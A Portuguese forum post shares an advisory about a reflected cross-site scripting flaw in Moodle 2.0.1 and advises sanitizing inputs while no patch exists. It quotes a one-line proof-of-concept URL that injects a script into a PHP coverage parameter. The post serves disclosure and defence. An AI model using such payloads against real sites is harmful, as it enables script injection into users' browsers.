Jump to content
apocsantos

Moodle (Sem patch disponibilizado)

Recommended Posts

apocsantos

    Boa noite,

    Como muita gente usa, eu incluído, O Moodle, achei interessante partilhar a informação que recebi sobre uma vulnerabilidade de Cross-Site Scripting, detectada na plataforma Moodle 2.0.1. Apesar de ainda não existir um "patch" oficial se houver o cuidado de controlar os inputs todos, de forma a aplicar sanitize, o problema fica contido. Par ao fazer tem de se editar os ficheiros manualmente. (pelo menos para já)

    Aqui fica uma citação do artigo original, onde mensiona a respectiva prova de conceito.

Author..................AutoSec Tools

Site....................http://www.autosectools.com/

------------------------------------------------------------------------

--Description--

A reflected cross-site scripting vulnerability in Moodle 2.0.1 can be

exploited to execute arbitrary JavaScript.

--PoC--

http://localhost/moodle/lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php?PHPCOVERAGE_HOME=%3Cscript%3Ealert(0)%3C/script%3E

Cordiais cumprimentos,

Apocsantos


"A paciência é uma das coisas que se aprendeu na era do 48k" O respeito é como a escrita de código, uma vez perdido, dificilmente se retoma o habito"

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.